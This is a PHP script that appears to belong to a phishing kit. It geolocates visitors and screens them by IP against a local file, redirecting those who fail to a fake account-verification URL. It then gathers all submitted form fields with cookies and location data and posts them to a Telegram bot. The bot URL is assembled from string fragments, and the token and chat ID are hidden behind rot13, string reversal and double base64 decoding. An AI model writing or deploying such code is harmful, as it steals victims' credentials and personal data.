<?php
if (!empty($_SERVER['HTTP_CLIENT_IP']))
{
    $ipAddress_callmoto = $_SERVER['HTTP_CLIENT_IP'];
}
elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
    $ipAddress_callmoto = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else
{
    $ipAddress_callmoto = $_SERVER['REMOTE_ADDR'];
}
$newFunctionName1 = 'fx1_' . uniqid();
$newFunctionName2 = 'fx2_' . uniqid();
$newFunctionName3 = 'fx3_' . uniqid();
$validIPs_callmoto = array();
$ipMatches = preg_match_all('/\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b/', $ipAddress_callmoto, $matches);

if ($ipMatches)
{
    $validIPs_callmoto = $matches[0];
}

if (!empty($validIPs_callmoto))
{
    $StrupLom_callmoto = $validIPs_callmoto[0];
}
else
{
    $StrupLom_callmoto = "127.0.0.1";
}

$donflag_callmoto = $_SERVER['SERVER_NAME'];
$info_callmoto = unserialize(file_get_contents("http://ip-api.com/php/{$StrupLom_callmoto}?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query"));

if (!empty($info_callmoto)) {
    $my_isp = $info_callmoto['as'] ?? null;
    $my_country = $info_callmoto['country'] ?? null;
    $my_coun_code = $info_callmoto['countryCode'] ?? null;
    $my_city = $info_callmoto['city'] ?? null;
    $my_region = $info_callmoto['regionName'] ?? null;
}
$homeDomain = $_SERVER['HTTP_HOST'];
$parentDirectory = "https://$homeDomain/web";

$currentDirectory = __DIR__;
$webDirectory = '/web/';
$parts = explode($webDirectory, $currentDirectory, 2);
$subDirectories = explode('/', $parts[1]);
$StrongSol = $subDirectories[0];
$filename = 'local.txt';
$homeDomain = $_SERVER['HTTP_HOST'];
$parentDirectory = "https://$homeDomain/web/$StrongSol/$filename";
$ch = curl_init($parentDirectory);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$reslocal = curl_exec($ch);
if ($reslocal === false)
{
    die("cURL Error: " . curl_error($ch));
}
curl_close($ch);

if (empty($reslocal))
{
     $StrongSol = "" . basename(__DIR__);
    $homeDomain = $_SERVER['HTTP_HOST'];
    $verifyAccountURL = "https://$homeDomain/index.php?verify_account=session&" . md5(microtime()) . "&dispatch=" . sha1(microtime()) . "&access=&data=" . sha1(microtime()) . "&lolme=$StrongSol";
    echo "<script LANGUAGE='JavaScript'>
    window.location.href='$verifyAccountURL';
     </script>";
    exit();
}

if (trim($reslocal) != trim($StrupLom_callmoto))
{
    $StrongSol = "" . basename(__DIR__);
    $homeDomain = $_SERVER['HTTP_HOST'];
    $verifyAccountURL = "https://$homeDomain/index.php?verify_account=session&" . md5(microtime()) . "&dispatch=" . sha1(microtime()) . "&access=&data=" . sha1(microtime()) . "&lolme=$StrongSol";
    echo "<script LANGUAGE='JavaScript'>
    window.location.href='$verifyAccountURL';
     </script>";

    exit();

}
if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    $postDataString = "";
    $pro_nm = "";
    $source_nm = "";
    foreach ($_POST as $key => $value)
    {
        if (!empty($_COOKIE['project']))
        {
            $pro_nm = $_COOKIE['project'];
        }
        if (!empty($_COOKIE['sourceme']))
        {
            $source_nm = $_COOKIE['sourceme'];
        }
        $postDataString .= "$key = $value\n";
    }
     
    if (!empty($postDataString))
    {
       $postDataString .= "Client: $source_nm\nProject: $pro_nm\nCountry: $my_country\nURL: $homeDomain\n";   
       ${$newFunctionName1}($postDataString);
    
    }
}

${$newFunctionName2} = function($input) {
    return str_rot13($input); 
};

${$newFunctionName3} = function($input) {
    return strrev($input); 
};

${$newFunctionName1} = function($globalvalue) use ($newFunctionName2, $newFunctionName3) {
    $algo_space = $newFunctionName3($globalvalue);
    $sev_epon = $newFunctionName2($algo_space);
    $sev_flax = base64_decode(base64_decode($sev_epon));
    return $sev_flax; 
};

${$newFunctionName1} = function($__) use ($newFunctionName1, $newFunctionName2, $newFunctionName3) {
    $___ = $newFunctionName1("==DC9RHG3AzrAqKE65RZeESG");
    $____ = $newFunctionName1("==DC9pKLcuJZI1TnkbIAIuHLYymEB1zFhy1DF1zI5SSJwcaFg1xAxuxJmHyowSGIISyDjExGkRxrBEGJR1xZAczG");
    $_______ = "h"."tt"."ps".":/"."/a"."p"."i"."."."t"."el"."egr"."am."."or"."g/b"."ot{$____}/sen"."dM"."es"."sa"."ge";
    $________ = ["chat_id" => $___, "text" => $__];
    $______ = curl_init();
    curl_setopt($______, CURLOPT_URL, $_______);
    curl_setopt($______, CURLOPT_POST, true);
    curl_setopt($______, CURLOPT_POSTFIELDS, http_build_query($________));
    curl_setopt($______, CURLOPT_RETURNTRANSFER, true);
    $_________ = curl_exec($______);
    curl_close($______);
};
?>
